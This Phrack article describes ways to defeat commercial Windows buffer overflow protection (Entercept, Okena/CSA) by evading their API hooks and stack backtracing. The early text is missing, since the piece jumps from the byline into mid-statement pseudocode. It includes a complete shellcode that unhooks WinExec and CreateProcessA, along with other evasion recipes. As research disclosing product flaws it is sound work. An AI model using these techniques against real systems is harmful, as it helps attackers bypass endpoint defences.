==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10 |=-----------------------------------------------------------------------=| |=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=| |=-----------------------------------------------------------------------=| |=--------------=[ anonymous ]=-------------=| |=--------------=[ anonymous permissions & WRITABLE) return BUFFER_OVERFLOW; ret = page_originates_from_file( page ); if (ret != TRUE) return BUFFER_OVERFLOW; [-----------------------------------------------------------] Pseudo code for code page permission checking Buffer overflow protection technologies (BOPT) that rely on stack backtracing don't actually create non-executable heap and stack segments. Instead they hook the OS and check for shellcode execution during the hooked API calls. Most operating systems can be hooked in userland or in kernel. Next section deals with evading kernel hooks, while section 4 deals with bypassing userland hooks. --[ 3 - Evading Kernel Hooks When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must be able to detect where a userland API call originated. Due to the heavy use of kernel32.dll and ntdll.dll libraries, an API call is usually several stack frames away from the actual syscall trap call. For this reason, some intrusion preventions systems rely on using stack backtracing to locate the original caller of a system call. ----[ 3.1 - Kernel Stack Backtracing While stack backtracing can occur from either userland or kernel, it is far more important for the kernel components of a BOPT than its userland components. The existing commercial BOPT's kernel components rely entirely on stack backtracing to detect shellcode execution. Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism. Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests described above. Frequently, there is also an additional "return into libc" check, which involves checking that a return address points to an instruction immediately following a call or a jump. The basic operation of stack backtracing code, as used by a BOPT, is presented below. [-----------------------------------------------------------] while (is_valid_frame_pointer( ebp )) { ret_addr = get_ret_addr( ebp ); if (check_code_page(ret_addr) == BUFFER_OVERFLOW) return BUFFER_OVERFLOW; if (does_not_follow_call_or_jmp_opcode(ret_addr)) return BUFFER_OVERFLOW; ebp = get_next_frame( ebp ); } [-----------------------------------------------------------] Pseudo code for BOPT stack backtracing When discussing how to evade stack backtracing, it is important to understand how stack backtracing works on an x86 architecture. A typical stack frame looks as follows during a function call: : : |-------------------------| | function B parameter #2 | |-------------------------| | function B parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |=========================| | function A parameter #2 | |-------------------------| | function A parameter #1 | |-------------------------| | return EIP address | |-------------------------| | saved EBP | |-------------------------| : : The EBP register points to the next stack frame. Without the EBP register it is very hard, if not impossible, to correctly identify and trace through all the stack frames. Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead. With an EBP optimization, a stack frame looks as follows during a function call: |-----------------------| | function parameter #2 | |-----------------------| | function parameter #1 | |-----------------------| | return EIP address | |-----------------------| Notice that the EBP register is not present on the stack. Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing. This makes their task incredibly hard as a simple return into libc style attack will bypass the protection. Simply originating an API call one layer higher than the BOPT hook defeats the detection technique. ----[ 3.2 - Faking Stack Frames Since the stack is under complete control of the shellcode, it is possible to completely alter its contents prior to an API call. Specially crafted stack frames can be used to bypass the buffer overflow detectors. As was explained previously, the buffer overflow detector is looking for three key indicators of legitimate code: read-only page permissions, memory mapped file section and a return address pointing to an instruction immediately following a call or jmp. Since function pointers change calling semantics, BOPT do not (and cannot) check that a call or jmp actually points to the API being called. Most importantly, the BOPT cannot check return addresses beyond the last valid EBP frame pointer (it cannot stack backtrace any further). Evading a BOPT is therefore simply a matter of creating a "final" stack frame which has a valid return address. This valid return address must point to an instruction residing in a read-only memory mapped file section and immediately following a call or jmp. Provided that the dummy return address is reasonably close to a second return address, the shellcode can easily regain control. The ideal instruction sequence to point the dummy return address to is: [-----------------------------------------------------------] jmp [eax] ; or call [eax], or another register dummy_return: ... ; some number of nops or easily ; reversed instructions, e.g. inc eax ret ; any return will do, e.g. ret 8 [-----------------------------------------------------------] Bypassing kernel BOPT components is easy because they must rely on user controlled data (the stack) to determine the validity of an API call. By correctly manipulating the stack, it is possible to prematurely terminate the stack return address analysis. This stack backtracing evasion technique is also effective against userland hooks (see section 4.6). --[ 4 - Evading Userland Hooks Given the presence of the correct instruction sequence in a valid region of memory, it is possible to trivially bypass kernel buffer overflow protection techniques. Similar techniques can be used to bypass userland BOPT components. In addition, since the shellcode executes with the same permissions as the userland hooks, a number of other techniques can be used to evade the detection. ----[ 4.1 - Implementation Problems - Incomplete API Hooking There are many problems with the userland based buffer overflow protection technologies. For example, they require the buffer overflow protection code to be in the code path of all attacker's calls or the shellcode execution will go undetected. Trying to determine what an attacker will do with his or her shellcode a priori is an extremely hard problem, if not an impossible one. Getting on the right path is not easy. Some of the obstacles in the way include: a. Not accounting for both UNICODE and ANSI versions of a Win32 API call. b. Not following the chaining nature of API calls. For example, many functions in kernel32.dll are nothing more than wrappers for other functions within kernel32.dll or ntdll.dll. c. The constantly changing nature of the Microsoft Windows API. --------[ 4.1.1 - Not Hooking All API Versions A commonly encountered mistake with userland API hooking implementations is incomplete code path coverage. In order for an API interception based products to be effective, all APIs utilized by attackers must be hooked. This requires the buffer overflow protection technology to hook somewhere along the code path an attacker _has_ to take. However, as will be shown, once an attacker has begun executing code, it becomes very difficult for third party systems to cover all code paths. Indeed, no tested commercial buffer overflow detector actually provided an effective code path coverage. Many Windows API functions have two versions: ANSI and UNICODE. The ANSI function names usually end in A, and UNICODE functions end in W because of their wide character nature. The ANSI functions are often nothing more than wrappers that call the UNICODE version of the API. For example, CreateFileA takes the ANSI file name that was passed as a parameter and turns it into an UNICODE string. It then calls CreateFileW. Unless a vendor hooks both the UNICODE and ANSI version of the API function, an attacker can bypass the protection mechanism by simply calling the other version of the function. For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt to intercept LoadLibraryW. If a protection mechanism was only going to hook one version of a function, it would make more sense to hook the UNICODE version. For this particular function, Okena/CSA does a better job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and LoadLibraryExW. Unfortunately for the third party buffer overflow detectors, simply hooking more functions in kernel32.dll is not enough. --------[ 4.1.2 - Not Hooking Deeply Enough In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many buffer overflow detection products do not hook functions within ntdll.dll. This simple error is similar to not hooking both the UNICODE and ANSI versions of a function. An attacker can simply call the ntdll.dll directly and completely bypass all the kernel32.dll "checkpoints" established by a buffer overflow detector. For example, NAI Entercept tries to detect shellcode calling GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the same goal, and at the same time never pass through the NAI Entercept hook. Similarly, shellcode can completely bypass userland hooks altogether and make system calls directly (see section 4.5). --------[ 4.1.3 - Not Hooking Thoroughly Enough The interactions between the various different Win32 API functions is byzantine, complex and difficult to understand. A vendor must make only one mistake in order to create a window of opportunity for an attacker. For example, Okena/CSA and NAI Entercept both hook WinExec trying to prevent attacker's shellcode from spawning a process. The call path for WinExec looks like this: WinExec() --> CreateProcessA() --> CreateProcessInternalA() Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA() (see Appendix A and B). However, neither product hooks CreateProcessInternalA() (exported by kernel32.dll). When writing a shellcode, an attacker could find the export for CreateProcessInternalA() and use it instead of calling WinExec(). CreateProcessA() pushes two NULLs onto the stack before calling CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs and then call CreateProcessInternalA() directly to evade the userland API hooks of both products. As new DLLs and APIs are released, the complexity of Win32 API internal interactions increases, making the problem worse. Third party product vendors are at a severe disadvantage when implementing their buffer overflow detection technologies and are bound to make mistakes which can be exploited by attackers. ----[ 4.2 - Fun With Trampolines Most Win32 API functions begin with a five byte preamble. First, EBP is pushed onto the stack, then ESP is moved into EBP. [-----------------------------------------------------------] Code Bytes Assembly 55 push ebp 8bec mov ebp, esp [-----------------------------------------------------------] Both Okena/CSA and Entercept use inline function hooking. They overwrite the first 5 bytes of a function with an immediate unconditional jump or call. For example, this is what the first few bytes of WinExec() look like after NAI Entercept's hooks have been installed: [-----------------------------------------------------------] Code Bytes Assembly e8 xx xx xx xx call xxxxxxxx 54 push esp 53 push ebx 56 push esi 57 push edi [-----------------------------------------------------------] Alternatively, the first few bytes could be overwritten with a jump instruction: [-----------------------------------------------------------] Code Bytes Assembly e9 xx xx xx xx jmp xxxxxxxx ... [-----------------------------------------------------------] Obviously, it is easy for shellcode to test for these and other signatures before calling a function. If a hijacking mechanism is detected, the shellcode can use several different techniques to bypass the hook. ------[ 4.2.1 - Patch Table Jumping When an API is hooked, the original preamble is saved into a table so that the buffer overflow detector can recreate the original API after performing its validation checks. The preamble is stored in a patch table, which resides somewhere in the address space of an application. When shellcode detects the presence of an API hook, it can simply search for the patch table and make its calls to patch table entries. This completely avoids the hook, preventing the userland buffer overflow detector components from ever being in the attacker's call path. ------[ 4.2.2 - Hook Hopping Alternatively, instead of locating the patch table, shellcode can include its own copy of the original pre-hook preamble. After executing its own API preamble, the shellcode can transfer execution to immediately after the API hook (function address plus five bytes). Since Intel x86 has variable length instructions, one must take this into account in order to land on an even instruction boundary: [-----------------------------------------------------------] Shellcode: call WinExecPreamble WinExecPreamble: push ebp mov ebp, esp sub esp, 54 jmp WinExec+6 [-----------------------------------------------------------] This technique will not work if another function within the call path is also hooked. In this case, Entercept also hooks CreateProcessA(), which WinExec() calls. Thus, to evade detection shellcode should call CreateProcessA() using the stored copy of CreateProcessA's preamble. ----[ 4.3 - Repatching Win32 APIs Thoroughly hooking Win32 APIs is not effective when certain fundamental errors are made in the implementation of a userland buffer overflow detection component. Certain implementations (NAI Entercept) have a serious problem with the way they perform their API hooking. In order to be able to overwrite preambles of hooked functions, the code section for a DLL has to be made writable. Entercept marks code sections of kernel32.dll and ntdll.dll as writable in order to be able to modify their contents. However, Entercept never resets the writable bit! Due to this serious security flaw, it is possible for an attacker to overwrite the API hook by re-injecting the original preamble code. For the WinExec() and CreateProcessA() examples, this would require overwriting the first 6 bytes (just to be instruction aligned) of WinExec() and CreateProcessA() with the original preamble. [-----------------------------------------------------------] WinExecOverWrite: Code Bytes Assembly 55 push ebp 8bec mov ebp, esp 83ec54 sub esp, 54 CreateProcessAOverWrite: Code Bytes Assembly 55 push ebp 8bec mov ebp, esp ff752c push DWORD PTR [ebp+2c] [-----------------------------------------------------------] This technique will not work against properly implemented buffer overflow detectors, however it is very effective against NAI Entercept. A complete shellcode example which overwrites the NAI Entercept hooks is presented below: [-----------------------------------------------------------] // This sample code overwrites the preamble of WinExec and // CreateProcessA to avoid detection. The code then // calls WinExec with a "calc.exe" parameter. // The code demonstrates that by overwriting function // preambles, it is able to evade Entercept and Okena/CSA // buffer overflow protection. _asm { pusha jmp JUMPSTART START: pop ebp xor eax, eax mov al, 0x30 mov eax, fs:[eax]; mov eax, [eax+0xc]; // We now have the module_item for ntdll.dll mov eax, [eax+0x1c] // We now have the module_item for kernel32.dll mov eax, [eax] // Image base of kernel32.dll mov eax, [eax+0x8] movzx ebx, word ptr [eax+3ch] // pe.oheader.directorydata[EXPORT=0] mov esi, [eax+ebx+78h] lea esi, [eax+esi+18h] // EBX now has the base module address mov ebx, eax lodsd // ECX now has the number of function names mov ecx, eax lodsd add eax,ebx // EDX has addresses of functions mov edx,eax lodsd // EAX has address of names add eax,ebx // Save off the number of named functions // for later push ecx // Save off the address of the functions push edx RESETEXPORTNAMETABLE: xor edx, edx INITSTRINGTABLE: mov esi, ebp // Beginning of string table inc esi MOVETHROUGHTABLE: mov edi, [eax+edx*4] add edi, ebx // EBX has the process base address xor ecx, ecx mov cl, BYTE PTR [ebp] test cl, cl jz DONESTRINGSEARCH STRINGSEARCH: // ESI points to the function string table repe cmpsb je Found // The number of named functions is on the stack cmp [esp+4], edx je NOTFOUND inc edx jmp INITSTRINGTABLE Found: pop ecx shl edx, 2 add edx, ecx mov edi, [edx] add edi, ebx push edi push ecx xor ecx, ecx mov cl, BYTE PTR [ebp] inc ecx add ebp, ecx jmp RESETEXPORTNAMETABLE DONESTRINGSEARCH: OverWriteCreateProcessA: pop edi pop edi push 0x06 pop ecx inc esi rep movsb OverWriteWinExec: pop edi push edi push 0x06 pop ecx inc esi rep movsb CallWinExec: push 0x03 push esi call [esp+8] NOTFOUND: pop edx STRINGEXIT: pop ecx popa; jmp EXIT JUMPSTART: add esp, 0x1000 call START WINEXEC: _emit 0x07 _emit 'W' _emit 'i' _emit 'n' _emit 'E' _emit 'x' _emit 'e' _emit 'c' CREATEPROCESSA: _emit 0x0e _emit 'C' _emit 'r' _emit 'e' _emit 'a' _emit 't' _emit 'e' _emit 'P' _emit 'r' _emit 'o' _emit 'c' _emit 'e' _emit 's' _emit 's' _emit 'A' ENDOFTABLE: _emit 0x00 WinExecOverWrite: _emit 0x06 _emit 0x55 _emit 0x8b _emit 0xec _emit 0x83 _emit 0xec _emit 0x54 CreateProcessAOverWrite: _emit 0x06 _emit 0x55 _emit 0x8b _emit 0xec _emit 0xff _emit 0x75 _emit 0x2c COMMAND: _emit 'c' _emit 'a' _emit 'l' _emit 'c' _emit '.' _emit 'e' _emit 'x' _emit 'e' _emit 0x00 EXIT: _emit 0x90 // Normally call ExitThread or something here _emit 0x90 } [-----------------------------------------------------------] ----[ 4.4 - Attacking Userland Components While evading the hooks and techniques used by userland buffer overflow detector components is effective, there exist other mechanisms of bypassing the detection. Because both the shellcode and the buffer overflow detector are executing with the same privileges and in the same address space, it is possible for shellcode to directly attack the buffer overflow detector userland component. Essentially, when attacking the buffer overflow detector userland component the attacker is attempting to subvert the mechanism used to perform the shellcode detection check. There are only two principle techniques for shellcode validation checking. Either the data used for the check is determined dynamically during each hooked API call, or the data is gathered at process start up and then checked during each call. In either case, it is possible for an attacker to subvert the process. ------[ 4.4.1 - IAT Patching Rather than implementing their own versions of memory page information functions, the commercial buffer overflow protection products simply use the operating system APIs. In Windows NT, these are implemented in ntdll.dll. These APIs will be imported into the userland component (itself a DLL) via its PE Import Table. An attacker can patch vectors within the import table to alter the location of an API to a function supplied by the shellcode. By supplying the function used to do the validation checking by the buffer overflow detector, it is trivial for an attacker to evade detection. ------[ 4.4.2 - Data Section Patching For various reasons, a buffer overflow detector might use a pre-built list of page permissions within the address space. When this is the case, altering the address of the VirtualQuery() API is not effective. To subvert the buffer overflow detector, the shellcode has to locate and modify the data table used by the return address validation routines. This is a fairly straightforward, although application specific, technique for subverting buffer overflow prevention technologies. ----[ 4.5 - Calling Syscalls Directly As mentioned above, rather than using ntdll.dll APIs to make system calls, it is possible for an attacker to create shellcode which makes system call directly. While this technique is very effective against userland components, it obviously cannot be used to bypass kernel based buffer overflow detectors. To take advantage of this technique you must understand what parameters a kernel function uses. These may not always be the same as the parameters required by the kernel32 or ntdll API versions. Also, you must know the system call number of the function in question. You can find this dynamically using a technique similar to the one to find function addresses. Once you have the address of the ntdll.dll version of the function you want to call, index into the function one byte and read the following DWORD. This is the system call number in the system call table for the function. This is a common trick used by rootkit developers. Here is the pseudo code for calling NtReadFile system call directly: ... xor eax, eax // Optional Key push eax // Optional pointer to large integer with the file offset push eax push Length_of_Buffer push Address_of_Buffer // Before call make room for two DWORDs called the IoStatusBlock push Address_of_IoStatusBlock // Optional ApcContext push eax // Optional ApcRoutine push eax // Optional Event push eax // Required file handle push hFile // EAX must contain the system call number mov eax, Found_Sys_Call_Num // EDX needs the address of the userland stack lea edx, [esp] // Trap into the kernel // (recent Windows NT versions use "sysenter" instead) int 2e ----[ 4.6 - Faking Stack Frames As described in section 3.2, kernel based stack backtracing can be bypassed using fake frames. Same techniques works against userland based detectors. To bypass both userland and kernel backtracing, shellcode can create a fake stack frame without the ebp register on stack. Since stack backtracing relies on the presence of the ebp register to find the next stack frame, fake frames can stop backtracing code from tracing past the fake frame. Of course, generating a fake stack frame is not going to work when the EIP register still points to shellcode which resides in a writable memory segment. To bypass the protection code, shellcode needs to use an address that lies in a non-writable memory segment. This presents a problem since shellcode needs a way to eventually regain control of the execution. The trick to regaining control is to proxy the return to shellcode through a "ret" instruction which resides in a non-writable memory segment. "ret" instruction can be found dynamically by searching memory for a 0xC3 opcode. Here is an illustration of a normal LoadLibrary("kernel32.dll") call that originates from a writable memory segment: push kernel32_string call LoadLibrary return_eip: . . . LoadLibrary: ; * see below for a stack illustration . . . ret ; return to stack-based return_eip |------------------------------| | address of "kernel32.dll" str| |------------------------------| | return address (return_eip) | |------------------------------| As explained before, the buffer overflow protection code executes before LoadLibrary gets to run. Since the return address (return_eip) is in a writable memory segment, the protection code logs the overflow and terminates the process. Next example illustrates 'proxy through a "ret" instruction' technique: push return_eip push kernel32_string ; fake "call LoadLibrary" call push address_of_ret_instruction jmp LoadLibrary return_eip: . . . LoadLibrary: ; * see below for a stack illustration . . . ret ; return to non stack-based address_of_ret_instruction address_of_ret_instruction: . . . ret ; return to stack-based return_eip Once again, the buffer overflow protection code executes before LoadLibrary gets to run. This time though, the stack is setup with a return address pointing to a non-writable memory segment. In addition, the ebp register is not present on stack thus the protection code cannot perform stack backtracing and determine that the return address in the next stack frame points to a writable segment. This allows the shellcode to call LoadLibrary which returns to the "ret" instruction. In its turn, the "ret" instruction pops the next return address off stack (return_eip) and transfers control to it. |------------------------------| | return address (return_eip) | |------------------------------| | address of "kernel32.dll" str| |------------------------------| | address of "ret" instruction | |------------------------------| In addition, any number of arbitrary complex fake stack frames can be setup to further confuse the protection code. Here is an example of a fake frame that uses a "ret 8" instruction instead of simple "ret": |--------------------------------| | return address | |--------------------------------| | address of "ret" instruction | <- fake frame 2 |--------------------------------| | any value | |--------------------------------| | address of "kernel32.dll" str | |--------------------------------| | address of "ret 8" instruction | <- fake frame 1 |--------------------------------| This causes an extra 32-bit value to be removed from stack, complicating any kind of analysis even further. --[ 5 - Conclusions The majority of commercial security systems do not actually prevent buffer overflows but rather detect the execution of shellcode. The most common technology used to detect shellcode is code page permission checking which relies on stack backtracing. Stack backtracing involves traversing stack frames and verifying that the return addresses do not originate from writable memory segments such as stack or heap areas. The paper presents a number of different ways to bypass both userland and kernel based stack backtracing. These range from tampering with function preambles to creating fake stack frames. In conclusion, the majority of current buffer overflow protection implementations are flawed, providing a false sense of security and little real protection against determined attackers. Appendix A: Entercept 4.1 Hooks Entercept hooks a number of functions in userland and in the kernel. Here is a list of the currently hooked functions as of Entercept 4.1. User Land msvcrt.dll _creat _read _write system kernel32.dll CreatePipe CreateProcessA GetProcAddress GetStartupInfoA LoadLibraryA PeekNamedPipe ReadFile VirtualProtect VirtualProtectEx WinExec WriteFile advapi32.dll RegOpenKeyA rpcrt4.dll NdrServerInitializeMarshall user32.dll ExitWindowsEx ws2_32.dll WPUCompleteOverlappedRequest WSAAddressToStringA WSACancelAsyncRequest WSACloseEvent WSAConnect WSACreateEvent WSADuplicateSocketA WSAEnumNetworkEvents WSAEventSelect WSAGetServiceClassInfoA WSCInstallNameSpace wininet.dll InternetSecurityProtocolToStringW InternetSetCookieA InternetSetOptionExA lsasrv.dll LsarLookupNames LsarLookupSids2 msv1_0.dll Msv1_0ExportSubAuthenticationRoutine Msv1_0SubAuthenticationPresent Kernel NtConnectPort NtCreateProcess NtCreateThread NtCreateToken NtCreateKey NtDeleteKey NtDeleteValueKey NtEnumerateKey NtEnumerateValueKey NtLoadKey NtLoadKey2 NtQueryKey NtQueryMultipleValueKey NtQueryValueKey NtReplaceKey NtRestoreKey NtSetValueKey NtMakeTemporaryObject NtSetContextThread NtSetInformationProcess NtSetSecurityObject NtTerminateProcess Appendix B: Okena/Cisco CSA 3.2 Hooks Okena/CSA hooks many functions in userland but many less in the kernel. A lot of the userland hooks are the same ones that Entercept hooks. However, almost all of the functions Okena/CSA hooks in the kernel are related to altering keys in the Windows registry. Okena/CSA does not seem as concerned as Entercept about backtracing calls in the kernel. This leads to an interesting vulnerability, left as an exercise to the reader. User Land kernel32.dll CreateProcessA CreateProcessW CreateRemoteThread CreateThread FreeLibrary LoadLibraryA LoadLibraryExA LoadLibraryExW LoadLibraryW LoadModule OpenProcess VirtualProtect VirtualProtectEx WinExec WriteProcessMemory ole32.dll CoFileTimeToDosDateTime CoGetMalloc CoGetStandardMarshal CoGetState CoResumeClassObjects CreateObjrefMoniker CreateStreamOnHGlobal DllGetClassObject StgSetTimes StringFromCLSID oleaut32.dll LPSAFEARRAY_UserUnmarshal urlmon.dll CoInstall Kernel NtCreateKey NtOpenKey NtDeleteKey NtDeleteValueKey NtSetValueKey NtOpenProcess NtWriteVirtualMemory |=[ EOF ]=---------------------------------------------------------------=|